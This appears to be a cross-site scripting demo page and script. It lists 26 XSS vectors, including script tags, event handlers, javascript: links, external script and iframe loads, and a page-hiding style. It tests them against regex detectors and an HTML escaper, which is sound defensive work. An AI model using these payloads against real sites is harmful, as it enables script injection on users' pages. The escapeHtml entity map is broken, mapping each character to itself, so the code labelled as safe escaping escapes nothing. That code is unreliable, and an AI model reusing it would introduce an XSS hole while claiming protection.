<html>
<html>
<head>
<title>XSS</title>
</head>
<body>
<a href="xss.html">View XSS's in action here</a>
- some may interfer with other, to view an individual vector remove all other vectors
<br>
<br>
<br>
<hr>
<pre id="results"></pre>
<div id="results_html"></div>
<div id="results_text"></div>
<script type="text/javascript" src="script.js"></script>
</body>
</html>
var xsss = [
`<script >alert("XSS - 1");</script >`,
`<script type="application/javascript">alert("XSS - 2");</script >`,
`<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >`,
`<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />`,
`<input type="image" src onerror="alert('XSS - 5')">`,
`<object data="a.a" onerror="alert('XSS - 6')" />`,
`<object data="a.a" onerror="alert('XSS - 7')">`,
`<link data="a.a" onerror="alert('XSS - 8')">`,
`<input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause infinate loop`,
`<video ><source onerror="alert('XSS - 10')" >`,
`<iframe srcdoc="<script>alert('XSS - 11')</script>">`,
`<iframe srcdoc="<script>alert('XSS - 12')</script>" />`,
`<iframe srcdoc="<script>alert('XSS - 13')</script>"></iframe >`,
`<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >`,
`<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">`,
`<iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe >`,
`<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div >`,
`<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')">`,
`<frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset >`,
`<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" > `,
`<a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" > `,
`<a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" > `,
`<body onunload="alert('XSS - 23')">`,
`<body onresize="alert('XSS - 24');">`,
`<body onload="alert('XSS - 25')">`,
`<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">`,
]
var xssSimple = new RegExp('((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)', 'i')
var xssImgSrc = new RegExp('((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)', 'i')
var xssAnyTag = new RegExp('<(|\/|[^\/>][^>]+|\/[^>][^>]+)>')
log("\n## Current isXss function:")
isXss = function(value) {
return xssSimple.test(value) || xssImgSrc.test(value)
}
// prints false for all
for(var i in xsss){
log( isXss(xsss[i]) + ": isXss(`" + xsss[i] + "`)");
}
log("\n## isXss function that strips all tags:")
// Current isXss function that also checks for any tags
isXss = function(value) {
return xssSimple.test(value) || xssImgSrc.test(value) || xssAnyTag.test(value)
}
// prints true for all
for(var i in xsss){
log( isXss(xsss[i]) + ": isXss(`" + xsss[i] + "`)");
}
var entityMap = {
'&': '&',
'<': '<',
'>': '>',
'"': '"',
"'": ''',
'/': '/',
'`': '`',
'=': '='
};
escapeHtml = function(value) {
return String(value).replace(/[&<>"'`=\/]/g, function (s) {
return entityMap[s];
});
}
log_html("<b>Directly writing escaped Html safely</b>")
for(var i in xsss){
log_html( escapeHtml(xsss[i]) );
}
log_text("\n## Directly writing unescaped Html safely to the text attribute</b>")
for(var i in xsss){
log_text(xsss[i]);
}
function log_text(html){
document.getElementById("results_text").innerText += html + "\n";
}
function log_html(html){
document.getElementById("results_html").innerHTML += html + "<br>";
}
function log(text){
document.getElementById("results").innerText += text + "\n";
}
To test an individual vector, remove all except that line
<script >alert("XSS - 1");</script >
<script type="application/javascript">alert("XSS - 2");</script >
<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >
<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />
<input type="image" src onerror="alert('XSS - 5')">
<object data="a.a" onerror="alert('XSS - 6')" />
<object data="a.a" onerror="alert('XSS - 7')">
<link data="a.a" onerror="alert('XSS - 8')">
<input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause infinate loop
<video ><source onerror="alert('XSS - 10')" >
<iframe srcdoc="<script>alert('XSS - 11')</script>">
<iframe srcdoc="<script>alert('XSS - 12')</script>" />
<iframe srcdoc="<script>alert('XSS - 13')</script>"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">
<iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe >
<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div >
<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')">
<frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset >
<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" >
<a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" >
<a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" >
<body onunload="alert('XSS - 23')">
<body onresize="alert('XSS - 24');">
<body onload="alert('XSS - 25')">
<!-- XSS - 26: No JavaScript, but fully hides the page and prevents any clicks -->
<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">